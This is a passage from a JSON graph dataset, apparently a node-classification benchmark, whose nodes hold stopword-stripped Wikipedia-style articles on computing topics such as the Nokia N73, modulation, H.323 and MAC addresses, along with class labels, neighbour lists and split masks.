one button pops message pressed quits example window sized automatically fit components additional code calculates location put center screen making visible 3 code shown used generate yoix logo image png format seen language description box near top page command-line arguments allow size image specified well select png image output display on-screen window",
    "neighbors": [
      1152,
      9345,
      8582,
      4490,
      6797,
      5677,
      7983,
      8628,
      823,
      1591,
      1343,
      5059,
      225,
      5612,
      9330,
      9714,
      5492,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7399,
    "label": 2,
    "text": "Nokia_N73:nokia n73 nokia n73 smartphone announced nokia 25 april 2006 part nseries started shipping 24 july n73 succeeded n70 packed numerous multimedia features features 3.2 megapixel autofocus camera front camera then-large 2.4 inch display stereo speakers relatively slim pocketable size form runs symbian v9.1 s60 3rd edition became one top selling nseries devices 2006 2007 high popularity helped nokia sales 'multimedia phones grow 28 year-on-year q3 2007 according nokia top selling line n70 n95 common nokia 'nseries 'eseries phones time late 2006 n73 comes loaded many software applications including contacts messaging picture video galleries music player visual fm radio realplayer im client wap browser full web browser based khtml/webkit microsoft office document viewer pdf viewer adobe flash lite viewer games majority applications support background execution example one may listen music browsing internet may switch write text message e-mail without close applications exception newer sony ericsson phones like k550 w610 smartphones typically limited way example music player run background java applications well symbian s60 release 3 applications installed removed phone user using either nokia pc suite software included phone installer application phone n73 uses database system supplied 'gallery applications permanently run background order reduce seek operation times databases updated locally device means supported image video audio files placed almost anywhere file system browsed easily case mp3 audio files id3 tag e.g 'album 'artist etc. notably nokia supports firmware upgrades n73 made user via module nokia pc suite directly over-the-air besides original edition nokia released three variants n73 addition basic n73 nokia subsequently released n73 'music edition 'multimedia button keypad replaced button starts music player phone music edition also includes 2gb memory card phone completely black music player music edition supports album art visualisations regular n73 music player application stays background time even music played later firmware versions application terminated prevents music edition remote control working application started using phone keypad 'n73 internet edition essentially music edition retaining 'multimedia button function rather dedicated 'music button 'n73 internet edition available middle east north africa nokia also released another model n73 called 'n73 special edition middle east north africa phone released muslim holy month ramadan 2007 phone hardware editions n73 comes pre-loaded islamic applications phone completely white nokia also released n73 special edition indonesia without pre-loaded islamic applications three versions n73 appear updated software update 26 june 2007 updates standard n73 music player version music edition enhanced music player detailed keeping 'multimedia button function essentially making internet edition 2008 updates standard features nokia maps application installed default requires external bluetooth gps receiver nokia lifeblog ptt search applications carried previous updates plus addition nokia mobile tv application also installed default requires external nokia mobile tv receiver su-33w application available n77 camera much improved earlier firmware update phone takes 27 seconds boot compared 42 previous versions also n73 20 mb ram available boot little change users may able install n-gage application modified work n73 making better compared multimedia keypad rather single usage button features music player like supports album art visualizations enhanced control interface also available start screen menu key pressed hold phone boots also recent uk nokia poster campaigns black version phone advertised without term 'music edition o2 uk shop sells n73 silver/plum black black version multimedia button rather music button",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      4365,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      8627,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      3407,
      4305,
      5201,
      2259,
      6996,
      2901,
      854,
      6870,
      7253,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      487,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      5875,
      1533
    ],
    "mask": "Train"
  },
  {
    "node_id": 7400,
    "label": 5,
    "text": "Modulation:modulation electronics telecommunications modulation process varying one properties periodic waveform called carrier signal modulating signal typically contains information transmitted radio systems 20th century used frequency modulation fm amplitude modulation radio broadcast modulator device performs modulation demodulator sometimes detector demod device performs demodulation inverse modulation modem modulator–demodulator perform operations aim analog modulation transfer analog baseband lowpass signal example audio signal tv signal analog bandpass channel different frequency example limited radio frequency band cable tv network channel aim digital modulation transfer digital bit stream analog communication channel example public switched telephone network bandpass filter limits frequency range 300–3400 hz limited radio frequency band analog digital modulation facilitate frequency division multiplexing fdm several low pass information signals transferred simultaneously shared physical medium using separate passband channels several different carrier frequencies aim digital baseband modulation methods also known line coding transfer digital bit stream baseband channel typically non-filtered copper wire serial bus wired local area network aim pulse modulation methods transfer narrowband analog signal example phone call wideband baseband channel schemes bit stream another digital transmission system music synthesizers modulation may used synthesize waveforms extensive overtone spectrum using small number oscillators case carrier frequency typically order much lower modulating waveform see frequency modulation synthesis ring modulation synthesis analog modulation modulation applied continuously response analog information signal common analog modulation techniques include digital modulation analog carrier signal modulated discrete signal digital modulation methods considered digital-to-analog conversion corresponding demodulation detection analog-to-digital conversion changes carrier signal chosen finite number alternative symbols modulation alphabet simple example telephone line designed transferring audible sounds example tones digital bits zeros ones computers may however communicate telephone line means modems representing digital bits tones called symbols four alternative symbols corresponding musical instrument generate four different tones one time first symbol may represent bit sequence 00 second 01 third 10 fourth 11 modem plays melody consisting 1000 tones per second symbol rate 1000 symbols/second 1000 baud since tone i.e. symbol represents message consisting two digital bits example bit rate twice symbol rate i.e 2000 bits per second similar technique used dial-up modems opposed dsl modems according one definition digital signal modulated signal digital signal according another definition modulation form digital-to-analog conversion textbooks would consider digital modulation schemes form digital transmission synonymous data transmission would consider analog transmission fundamental digital modulation techniques based keying qam in-phase signal one example cosine waveform quadrature phase signal q example sine wave amplitude modulated finite number amplitudes summed seen two-channel system channel using ask resulting signal equivalent combination psk ask methods phases frequencies amplitudes assigned unique pattern binary bits usually phase frequency amplitude encodes equal number bits number bits comprises symbol represented particular phase frequency amplitude alphabet consists formula_1 alternative symbols symbol represents message consisting n bits symbol rate also known baud rate formula_2 symbols/second baud data rate formula_3 bit/second example alphabet consisting 16 alternative symbols symbol represents 4 bits thus data rate four times baud rate case psk ask qam carrier frequency modulated signal constant modulation alphabet often conveniently represented constellation diagram showing amplitude signal x-axis amplitude q signal y-axis symbol psk ask sometimes also fsk often generated detected using principle qam q signals combined complex-valued signal jq j imaginary unit resulting called equivalent lowpass signal equivalent baseband signal complex-valued representation real-valued modulated physical signal so-called passband signal rf signal general steps used modulator transmit data receiver side demodulator typically performs common digital communication systems design modulator demodulator must done simultaneously digital modulation schemes possible transmitter-receiver pair prior knowledge data encoded represented communications system digital communication systems modulator transmitter demodulator receiver structured perform inverse operations non-coherent modulation methods require receiver reference clock signal phase synchronized sender carrier signal case modulation symbols rather bits characters data packets asynchronously transferred opposite coherent modulation common digital modulation techniques msk gmsk particular cases continuous phase modulation indeed msk particular case sub-family cpm known continuous-phase frequency shift keying cpfsk defined rectangular frequency pulse i.e linearly increasing phase pulse one-symbol-time duration total response signaling ofdm based idea frequency-division multiplexing fdm multiplexed streams parts single original stream bit stream split several parallel data streams transferred sub-carrier using conventional digital modulation scheme modulated sub-carriers summed form ofdm signal dividing recombining help handling channel impairments ofdm considered modulation technique rather multiplex technique since transfers one bit stream one communication channel using one sequence so-called ofdm symbols ofdm extended multi-user channel access method orthogonal frequency-division multiple access ofdma multi-carrier code division multiple access mc-cdma schemes allowing several users share physical medium giving different sub-carriers spreading codes different users two kinds rf power amplifier switching amplifiers class amplifiers cost less use less battery power linear amplifiers output power however work relatively constant-amplitude-modulation signals angle modulation fsk psk cdma qam ofdm nevertheless even though switching amplifiers completely unsuitable normal qam constellations often qam modulation principle used drive switching amplifiers fm waveforms sometimes qam demodulators used receive signals put switching amplifiers automatic digital modulation recognition intelligent communication systems one important issues software defined radio cognitive radio according incremental expanse intelligent receivers automatic modulation recognition becomes challenging topic telecommunication systems computer engineering systems many civil military applications moreover blind recognition modulation type important problem commercial systems especially software defined radio usually systems extra information system configuration considering blind approaches intelligent receivers reduce information overload increase transmission performance obviously knowledge transmitted data many unknown parameters receiver signal power carrier frequency phase offsets timing information etc. blind identification modulation made fairly difficult becomes even challenging real-world scenarios multipath fading frequency-selective time-varying channels two main approaches automatic modulation recognition first approach uses likelihood-based methods assign input signal proper class another recent approach based feature extraction term digital baseband modulation digital baseband transmission synonymous line codes methods transfer digital bit stream analog baseband channel a.k.a lowpass channel using pulse train i.e discrete number signal levels directly modulating voltage current cable serial bus common examples unipolar non-return-to-zero nrz manchester alternate mark inversion ami codings pulse modulation schemes aim transferring narrowband analog signal analog baseband channel two-level signal modulating pulse wave pulse modulation schemes also allow narrowband analog signal transferred digital signal i.e. quantized discrete-time signal fixed bit rate transferred underlying digital transmission system example line code modulation schemes conventional sense since channel coding schemes considered source coding schemes cases analog-to-digital conversion techniques analog-over-analog methods analog-over-digital methods",
    "neighbors": [
      4609,
      3847,
      2057,
      10381,
      1550,
      7698,
      2968,
      2458,
      5020,
      9373,
      5664,
      11170,
      11686,
      7723,
      2989,
      1070,
      1969,
      2994,
      5304,
      1083,
      7490,
      67,
      3140,
      7108,
      11591,
      5321,
      7498,
      10833,
      4691,
      8287,
      3040,
      1121,
      3168,
      8160,
      2920,
      7400,
      2802,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7401,
    "label": 1,
    "text": "Diablo_Data_Systems:diablo data systems diablo data systems division xerox created acquisition diablo systems inc. us 29 million 1972 company founded 1969 george e. comstock charles l. waggoner others company best known hytype hytype ii diablo 630 daisywheel printers also produced hard disk drives resold dec rk02 rk03 removable disk drives used xerox manufactured xerox alto computer",
    "neighbors": [
      6741
    ],
    "mask": "Test"
  },
  {
    "node_id": 7402,
    "label": 4,
    "text": "Supplemental_access_control:supplemental access control supplemental access control sac set security features defined icao protecting data contained electronic travel documents e.g electronic passports sac specifies password authenticated connection establishment pace protocol supplements improves icao basic access control bac pace like bac prevents two types attacks implementation pace begins third generation electronic passports eu members must implement pace electronic passports end 2014 states sake global interoperability must implement pace without implementing bac inspection systems implement pace use supported mrtd chip thus important global interoperability achieved make enhancement reliable document verification process achieve interoperability called interoperability tests results last test focusing sac describe current state implementation field version 1.1 april 2014 icao supplemental access control technical report introduces chip authentication protocol alternative active authentication integrates pace achieving new protocol chip authentication mapping pace-cam allows faster execution separate protocols",
    "neighbors": [
      10685
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7403,
    "label": 2,
    "text": "Transcendent_memory:transcendent memory transcedent memory linux kernel feature representing class memory unknown dynamically variable size addressable indirectly kernel configured either persistent ephemeral meaning around might disappear without warning still fast enough synchronously accessible",
    "neighbors": [
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      541,
      4637,
      10785,
      9762,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      576,
      2625,
      6213,
      6730,
      8268,
      6221,
      86,
      10333,
      97,
      5222,
      2152,
      10856,
      8298,
      7285,
      9335,
      2168,
      1147,
      3197,
      4734,
      1150,
      2179,
      7812,
      10883,
      4747,
      6797,
      4238,
      10382,
      2195,
      9366,
      2711,
      6296,
      9882,
      7325,
      1694,
      9887,
      2723,
      3248,
      6837,
      10933,
      5815,
      5822,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6868,
      7382,
      8410,
      10971,
      1247,
      8928,
      1761,
      1253,
      2278,
      233,
      10482,
      5363,
      2294,
      8439,
      2809,
      2811,
      2304,
      10499,
      4360,
      1804,
      273,
      9490,
      11539,
      792,
      3871,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      4424,
      6988,
      10063,
      5457,
      11601,
      5975,
      10590,
      8545,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      7039,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      5008,
      7057,
      11667,
      9621,
      8602,
      8092,
      11678,
      1954,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      11184,
      3512,
      6075,
      6078,
      9151,
      1474,
      8136,
      457,
      5074,
      5080,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      5619,
      2036,
      8186,
      10235,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 7404,
    "label": 4,
    "text": "AppArmor_Mobile:apparmor mobile apparmor mobile division cutcom software inc. builds custom mobile safety apps emergency notification systems university college institutions canada united states australia company founded 2002 based toronto ontario canada apparmor partner institutions include university guelph university nevada reno queen university dalhousie university jacksonville university wilfrid laurier university apparmor safety apps include features push notifications location tracking click-to-call capability",
    "neighbors": [
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7405,
    "label": 9,
    "text": "Programmable_Macro_Language:programmable macro language programmable macro language pml domain specific language developed aveva enable customisation plant marine design products pml file-based interpreted language enables application developer design microsoft windows form-based add-ins included within aveva product plant design management system pdms pml originated computer-aided design centre cadcentre established cambridge uk 1967 uk ministry technology cadcentre later became aveva carried great deal early pioneering cad research early staff members went become prominent worldwide cad community brothers dick martin newell cadcentre arguably important single factor transformation cambridge one world high technology centers within years late 1970s early 1980s pml language facilitates customisation plant design management system pdms system may used industries marine offshore onshore oil gas chemical process plants mining currently three iterations pml language following pml code prints classic hello world string pdms command window define function helloworld endfunction code defines new pml function called helloworld takes parameters returns value simply assigns string 'hello world local variable calls p command print text command window within pdms order example work code placed inside file called helloworld.pmlfnc extension mandatory filename function name pml case sensitive file placed inside directory pdms searches pml code initialization process",
    "neighbors": [
      6797,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 7406,
    "label": 8,
    "text": "Yuuguu:yuuguu yuuguu desktop sharing web conferencing application software company behind yuuguu ltd. founded anish kapoor philip hemsted yuuguu acquired july 2010 via-vox ltd. holding company powwownow conference call company yuuguu offers cross network instant messaging real time collaboration instant screen sharing web conferencing remote support yuuguu desktop client cross-platform also web-based browser client may 2009 yuuguu added integration skype client",
    "neighbors": [
      10341,
      5612,
      4597,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 7407,
    "label": 5,
    "text": "H.323:h.323 h.323 recommendation itu telecommunication standardization sector itu-t defines protocols provide audio-visual communication sessions packet network h.323 standard addresses call signaling control multimedia transport control bandwidth control point-to-point multi-point conferences widely implemented voice videoconferencing equipment manufacturers used within various internet real-time applications gnugk netmeeting widely deployed worldwide service providers enterprises voice video services ip networks part itu-t h.32x series protocols also address multimedia communications isdn pstn ss7 3g mobile networks h.323 call signaling based itu-t recommendation q.931 protocol suited transmitting calls across networks using mixture ip pstn isdn qsig isdn call model similar isdn call model eases introduction ip telephony existing networks isdn-based pbx systems including transitions ip-based pbxs within context h.323 ip-based pbx might gatekeeper call control element provides service telephones videophones device may provide facilitate basic services supplementary services call transfer park pick-up hold first version h.323 published itu november 1996 emphasis enabling videoconferencing capabilities local area network lan quickly adopted industry means transmitting voice communication variety ip networks including wans internet see voip years h.323 revised re-published enhancements necessary better enable voice video functionality packet-switched networks version backward-compatible previous version recognizing h.323 used communication lans wans within large carrier networks title h.323 changed published 1998 title since remained unchanged packet-based multimedia communications systems current version h.323 approved 2009 one strength h.323 relatively early availability set standards defining basic call model also supplementary services needed address business communication expectations h.323 first voip standard adopt internet engineering task force ietf standard real-time transport protocol rtp transport audio video ip networks h.323 system specification describes use several itu-t ietf protocols protocols comprise core almost h.323 system many h.323 systems also implement protocols defined various provide supplementary services support deliver functionality user recommendations addition itu-t recommendations h.323 implements various ietf request comments rfcs media transport media packetization including real-time transport protocol rtp h.323 utilizes itu-defined codecs codecs defined outside itu codecs widely implemented h.323 equipment include h.323 terminals providing video communications shall capable encoding decoding video according h.261 qcif h.323 terminals shall audio codec shall capable encoding decoding speech according itu-t rec g.711 terminals shall capable transmitting receiving a-law μ-law support audio video codecs optional h.323 system defines several network elements work together order deliver rich multimedia communication capabilities elements terminals multipoint control units mcus gateways gatekeepers border elements collectively terminals multipoint control units gateways often referred endpoints h.323 uses tcp port number 1720 elements required least two terminals required order enable communication two people h.323 deployments gatekeeper employed order among things facilitate address resolution terminals h.323 network fundamental elements h.323 system devices users would normally encounter might exist form simple ip phone powerful high-definition videoconferencing system inside h.323 terminal something referred protocol stack implements functionality defined h.323 system protocol stack would include implementation basic protocol defined itu-t recommendation h.225.0 h.245 well rtp protocols described diagram figure 1 depicts complete sophisticated stack provides support voice video various forms data communication reality h.323 systems implement wide array capabilities logical arrangement useful understanding relationships multipoint control unit mcu responsible managing multipoint conferences composed two logical entities referred multipoint controller mc multipoint processor mp practical terms mcu conference bridge unlike conference bridges used pstn today significant difference however h.323 mcus might capable mixing switching video addition normal audio mixing done traditional conference bridge mcus also provide multipoint data collaboration capabilities means end user placing video call h.323 mcu user might able see participants conference hear voices gateways devices enable communication h.323 networks networks pstn isdn networks one party conversation utilizing terminal h.323 terminal call must pass gateway order enable parties communicate gateways widely used today order enable legacy pstn phones interconnect large international h.323 networks presently deployed services providers gateways also used within enterprise order enable enterprise ip phones communicate service provider users pstn gateways also used order enable videoconferencing devices based h.320 h.324 communicate h.323 systems third generation 3g mobile networks deployed today utilize h.324 protocol able communicate h.323-based terminals corporate networks gateway devices gatekeeper optional component h.323 network provides number services terminals gateways mcu devices services include endpoint registration address resolution admission control user authentication forth various functions performed gatekeeper address resolution important enables two endpoints contact without either endpoint know ip address endpoint gatekeepers may designed operate one two signaling modes namely direct routed gatekeeper routed mode direct routed mode efficient widely deployed mode mode endpoints utilize ras protocol order learn ip address remote endpoint call established directly remote device gatekeeper routed mode call signaling always passes gatekeeper latter requires gatekeeper processing power also gives gatekeeper complete control call ability provide supplementary services behalf endpoints h.323 endpoints use ras protocol communicate gatekeeper likewise gatekeepers use ras communicate gatekeepers collection endpoints registered single gatekeeper h.323 referred “ zone ” collection devices necessarily associated physical topology rather zone may entirely logical arbitrarily defined network administrator gatekeepers ability neighbor together call resolution happen zones neighboring facilitates use dial plans global dialing scheme dial plans facilitate “ inter-zone ” dialing two endpoints separate zones still communicate border elements peer elements optional entities similar gatekeeper manage endpoints directly provide services described ras protocol role border peer element understood via definition administrative domain administrative domain collection zones control single person organization service provider within service provider network may hundreds thousands gateway devices telephones video terminals h.323 network elements service provider might arrange devices zones enable service provider best manage devices control logical arrangement city taken together zones within service provider network would appear another service provider administrative domain border element signaling entity generally sits edge administrative domain communicates another administrative domain communication might include things access authorization information call pricing information important data necessary enable communication two administrative domains peer elements entities within administrative domain less help propagate information learned border elements throughout administrative domain architecture intended enable large-scale deployments within carrier networks enable services clearinghouses diagram figure 2 provides illustration administrative domain border elements peer elements gatekeepers h.323 defined binary protocol allows efficient message processing network elements syntax protocol defined asn.1 uses packed encoding rules per form message encoding efficient message encoding wire overview various communication flows h.323 systems address remote endpoint resolved endpoint use h.225.0 call signaling order establish communication remote entity h.225.0 messages simplest form h.323 call may established follows figure 3 example endpoint ep left initiated communication gateway right gateway connected call called party reality call flows often complex one shown calls utilize fast connect procedures defined within h.323 established 2 3 messages endpoints must notify gatekeeper gatekeepers used call call concluded device send release complete message endpoints required notify gatekeeper gatekeepers used call ended endpoints use ras protocol order communicate gatekeeper likewise gatekeepers use ras communicate peer gatekeepers ras fairly simple protocol composed messages namely endpoint powered generally send gatekeeper request grq message discover gatekeepers willing provide service gatekeepers respond gatekeeper confirm gcf endpoint select gatekeeper work alternatively possible gatekeeper predefined system ’ administrative setup need endpoint discover one endpoint determines gatekeeper work try register gatekeeper sending registration request rrq gatekeeper responds registration confirm rcf point endpoint known network make place calls endpoint wishes place call send admission request arq gatekeeper gatekeeper resolve address either locally consulting another gatekeeper querying network service return address remote endpoint admission confirm message acf endpoint place call upon receiving call remote endpoint also send arq receive acf order get permission accept incoming call necessary example authenticate calling device ensure available bandwidth call figure 4 depicts high-level communication exchange two endpoints ep two gatekeepers gk call initiated necessarily fully connected endpoints may initiate h.245 call control signaling order provide extensive control conference h.245 rather voluminous specification many procedures fully enable multipoint communication though practice implementations implement minimum necessary order enable point-to-point voice video communication h.245 provides capabilities capability negotiation master/slave determination opening closing logical channels i.e. audio video flows flow control conference control support unicast multicast communication allowing size conference theoretically grow without bound functionality provided h.245 capability negotiation arguably important enables devices communicate without prior knowledge capabilities remote entity h.245 enables rich multimedia capabilities including audio video text data communication transmission audio video text h.323 devices utilize itu-defined codecs codecs defined outside itu codecs widely implemented h.323 equipment include h.245 also enables real-time data conferencing capability protocols like t.120 t.120-based applications generally operate parallel h.323 system integrated provide user seamless multimedia experience t.120 provides capabilities application sharing t.128 electronic whiteboard t.126 file transfer t.127 text chat t.134 within context conference h.323 device initiates communication remote h.323 device h.245 communication established two entities terminal capability set tcs message first message transmitted side sending tcs message h.323 entities h.245 exchanges attempt determine device master slave process referred master/slave determination msd important master call settles disputes two devices example endpoints attempt open incompatible media flows master takes action reject incompatible flow capabilities exchanged master/slave determination steps completed devices may open logical channels media flows done simply sending open logical channel olc message receiving acknowledgement message upon receipt acknowledgement message endpoint may transmit audio video remote endpoint typical h.245 exchange looks similar figure 5 exchange messages two endpoints ep figure would transmitting audio direction number message exchanges numerous important purpose nonetheless takes time reason h.323 version 2 published 1998 introduced concept called fast connect enables device establish bi-directional media flows part h.225.0 call establishment procedures fast connect possible establish call bi-directional media flowing two messages like figure 3 fast connect widely supported industry even devices still implement complete h.245 exchange shown perform message exchange parallel activities noticeable delay calling called party voice internet protocol voip describes transmission voice using internet packet switched networks itu-t recommendation h.323 one standards used voip voip requires connection internet another packet switched network subscription voip service provider client analogue telephone adapter ata voip phone soft phone service provider offers connection voip services pstn service providers charge monthly fee additional costs calls made using voip two enterprise locations would necessarily require voip service provider example h.323 widely deployed companies wish interconnect remote locations ip using number various wired wireless technologies videoconference videoteleconference vtc set telecommunication technologies allowing two locations interact via two-way video audio transmissions simultaneously basically two types videoconferencing dedicated vtc systems required components packaged single piece equipment desktop vtc systems add-ons normal pc transforming vtc devices simultaneous videoconferencing among three remote points possible means multipoint control unit mcu mcu bridges ip isdn-based videoconferencing due price point proliferation internet broadband particular strong spurt growth use h.323-based ip videoconferencing h.323 accessible anyone high speed internet connection dsl videoconferencing utilized various situations example distance education telemedicine video relay service business h.323 used industry enable large-scale international video conferences significantly larger typical video conference one widely attended annual event called megaconference",
    "neighbors": [
      7681,
      10242,
      3460,
      1036,
      2833,
      531,
      10271,
      9381,
      8998,
      6567,
      9131,
      432,
      7478,
      1467,
      10558,
      5576,
      4809,
      10444,
      6993,
      4691,
      5843,
      5972,
      5472,
      6880,
      614,
      2150,
      5225,
      10349,
      4590,
      7407,
      124,
      3580
    ],
    "mask": "None"
  },
  {
    "node_id": 7408,
    "label": 8,
    "text": "Web_Services_Modeling_Language:web services modeling language wsml web service modeling language formal language provides syntax semantics web service modeling ontology wsmo words wsml provides means formally describe wsmo elements ontologies semantic web services goals mediators wsml based logical formalisms description logic first-order logic logic programming",
    "neighbors": [
      3000,
      1481,
      10452,
      8070
    ],
    "mask": "Test"
  },
  {
    "node_id": 7409,
    "label": 3,
    "text": "Data_synchronization:data synchronization data synchronization process establishing consistency among data source target data storage vice versa continuous harmonization data time fundamental wide variety applications including file synchronization mobile device synchronization e.g. pdas synchronization also useful encryption synchronizing public key servers tools available file synchronization version control cvs subversion etc distributed filesystems coda etc mirroring rsync etc attempt keep sets files synchronized however version control file synchronization tools deal modifications one copy files several theoretical models data synchronization exist research literature problem also related problem slepian–wolf coding information theory models classified based consider data synchronized problem synchronizing unordered data also known set reconciliation problem modeled attempt compute symmetric difference formula_1 two remote sets formula_2 formula_3 b-bit numbers solutions problem typified case two remote strings formula_4 formula_5 need reconciled typically assumed strings differ fixed number edits i.e character insertions deletions modifications data synchronization process reducing edit distance formula_4 formula_5 ideal distance zero applied filesystem based synchronizations data ordered many practical applications discussed referenced sometimes possible transform problem one unordered data process known shingling splitting strings shingles fault-tolerant systems distributed databases must able cope loss corruption part data first step usually replication involves making multiple copies data keeping date changes made however necessary decide copy rely loss corruption instance occurs simplest approach single master instance sole source truth changes replicated instances one instances becomes new master old master fails paxos raft complex protocols exist solve problems transient effects failover two instances thinking master time secret sharing useful failures whole nodes common moves synchronization explicit recovery process part read read data requires retrieving encoded data several different nodes corrupt out-of-date data may present nodes approach may also benefit use error correction code dhts blockchains try solve problem synchronization many nodes hundreds billions",
    "neighbors": [
      1668,
      9360,
      7315,
      1049,
      10265,
      5791,
      9248,
      3629,
      4919,
      3784,
      7499,
      8785,
      11605,
      11616,
      8674,
      362,
      5482,
      2285,
      7789,
      7409,
      380
    ],
    "mask": "None"
  },
  {
    "node_id": 7410,
    "label": 7,
    "text": "Gestigon:gestigon gestigon stylized gestigon software development company founded september 2011 sascha klement erhardt barth thomas martinetz company develops software solutions gesture control body tracking based 3d depth data gestigon developing augmented reality automotive solutions audi renault volkswagen company also working ar/vr headsets well consumer electronics smart home devices march 2017 gestigon acquired valeo french automotive supplier sascha klement worked student assistant ph.d. student professors thomas martinetz erhardt barth developing software solutions based time-of-flight sensors university lübeck since 2002 together founded gestigon 2011 seed-funding high-tech gründerfonds mittelständische beteiligungsgesellschaft schleswig-holstein local business angels march 2012 moritz von grotthuss joined company advisor later became ceo considered late-founder month gestigon received innovation award cebit 2012 one 15 startups receive award 276 candidates january 2013 gestigon participated ces las vegas later year also techcrunch disrupt new york city next year visteon volkswagen used gestigon gestures solutions products presented ces 2014 cebit 2014 “ cebit innovation award ” public displays gestigon technologies include audi ces 2015 ces 2016 volkswagen infineon gestigon launched virtual reality solution carnival techcrunch disrupt san francisco september 2015 using oculus rift different depth sensors first demo using mobile device done ces 2015 gestigon partnered several companies develop hardware solutions especially depth sensors provide sensing solutions 2015 gestigon partnered inuitive 3d computer vision image processors developer create vr unit system presented ces 2016 assembled oculus rift development kit july 2015 gestigon closed series financing round nbr technology ventures gmbh primary investor headed fabian von kuenheim financing round company received additional investments high-tech gründerfonds vorwerk direct selling ventures march 2017 gestigon developed software recognizes driving gestures gestigon develops software works 3d sensors recognize human gestures poses biometrical features real time gecko feature tracker developed company tracks individual measuring biometric features flamenco software finger hand gesture control gestigon developed carnival sdk software augmented reality virtual reality allows users see use hands virtual interfaces gestigon solutions based skeleton recognition software recognizes body parts 3d data making recognition faster accurate software sensor agnostic work based data depth module using time-of-flight- stereo- structured light technologies",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 7411,
    "label": 5,
    "text": "MAC_address:mac address media access control address mac address device unique identifier assigned network interface controller nic communications within network segment used network address ieee 802 network technologies including ethernet wi-fi bluetooth within open systems interconnection osi model mac addresses used medium access control protocol sublayer data link layer typically represented mac addresses recognizable six groups two hexadecimal digits separated hyphens colons separator see notational conventions mac address may referred burned-in address also known ethernet hardware address hardware address physical address confused memory physical address network node multiple nics must unique mac address sophisticated network equipment multilayer switch router may require one permanently assigned mac addresses mac addresses often assigned manufacturer network interface cards stored hardware card read-only memory firmware mechanism mac address typically includes manufacturer organizationally unique identifier oui mac addresses formed according principles two numbering spaces based extended unique identifiers eui managed institute electrical electronics engineers ieee eui-48 replaces obsolete term mac-48 eui-64 original ieee 802 mac address comes original xerox network systems ethernet addressing scheme 48-bit address space contains potentially 2 281,474,976,710,656 possible mac addresses ieee manages allocation mac addresses originally known mac-48 refers eui-48 identifiers ieee target lifetime 100 years 2080 applications using eui-48 space restricts applications accordingly ieee encourages adoption plentiful eui-64 non-ethernet applications distinction eui-48 mac-48 identifiers name application mac-48 used address hardware interfaces within existing 802-based networking applications eui-48 used 802-based networking also used identify devices software example bluetooth ieee considers mac-48 obsolete term eui-48 used cases addition eui-64 numbering system originally encompassed mac-48 eui-48 identifiers simple translation mechanism translations since deprecated individual address block iab inactive registry activity replaced ma-s ma-s previously named oui-36 registry product january 1 2014 iab uses oui ma-l ma-l registry previously named oui registry term oui still use calling registry belonging ieee registration authority concatenated 12 additional ieee-provided bits total 36 bits leaving 12 bits iab owner assign 4096 individual devices iab ideal organizations requiring 4096 unique 48-bit numbers eui-48 unlike oui allows assignee assign values various different number spaces example eui-48 eui-64 various context-dependent identifier number spaces individual address block could used assign eui-48 identifiers potential uses based oui iabs allocated reserved remain property ieee registration authority also noted 2007 september 2012 oui value 00:50 c2 used iab assignments september 2012 value 40 d8:55 used owners already assigned iab may continue use assignment another registry called ma-m mac addresses medium ma-m assignment block provides 2 eui-48 identifiers 2 eui-64 identifiers means first 28 bits ieee assigned bits first 24-bits assigned ma-m block oui assigned ieee reassigned addresses either universally administered addresses uaa locally administered addresses laa universally administered address uniquely assigned device manufacturer first three octets transmission order identify organization issued identifier known organizationally unique identifier oui remainder address three octets eui-48 five eui-64 assigned organization nearly manner please subject constraint uniqueness locally administered address assigned device network administrator overriding burned-in address universally administered locally administered addresses distinguished setting second-least-significant bit first octet address bit also referred u/l bit short universal/local identifies address administered bit 0 address universally administered 1 address locally administered example address first octet 06 hex binary form 00000110 second-least-significant bit 1 therefore locally administered address another example uses locally administered addresses decnet protocol mac address ethernet interface changed decnet software reflects decnet network address xx.yy host eliminates need address resolution protocol since mac address decnet host simply determined least significant bit address first octet 0 zero frame meant reach one receiving nic type transmission called unicast unicast frame transmitted nodes within collision domain modern wired setting collision domain usually length ethernet cable two network cards wireless setting collision domain receivers detect given wireless signal switch know port leads given mac address switch forward unicast frame ports except originating port action known unicast flood node matching hardware mac address accept frame network frames non-matching mac-addresses ignored unless device promiscuous mode least significant bit first octet set 1 frame still sent however nics choose accept based criteria matching mac address example based configurable list accepted multicast mac addresses called multicast addressing ieee built several special address types allow one network interface card addressed one time examples group addresses opposed individual addresses least significant bit first octet mac address distinguishes individual addresses group addresses bit set 0 individual addresses set 1 group addresses group addresses like individual addresses universally administered locally administered following network technologies use eui-48 identifier format every device connects ieee 802 network ethernet wifi eui-48 address common networked consumer devices pcs smartphones tablet computers use eui-48 addresses eui-64 identifiers used broadcast networks ethernet mac address expected uniquely identify node segment allows frames marked specific hosts thus forms basis link layer osi layer 2 networking upon upper layer protocols rely produce complex functioning networks many network interfaces support changing mac address unix-like systems command utility ifconfig may used remove add link address aliases instance active ifconfig directive may used netbsd specify attached addresses activate hence various configuration scripts utilities permit randomization mac address time booting establishing network connection changing mac addresses necessary network virtualization mac spoofing practiced 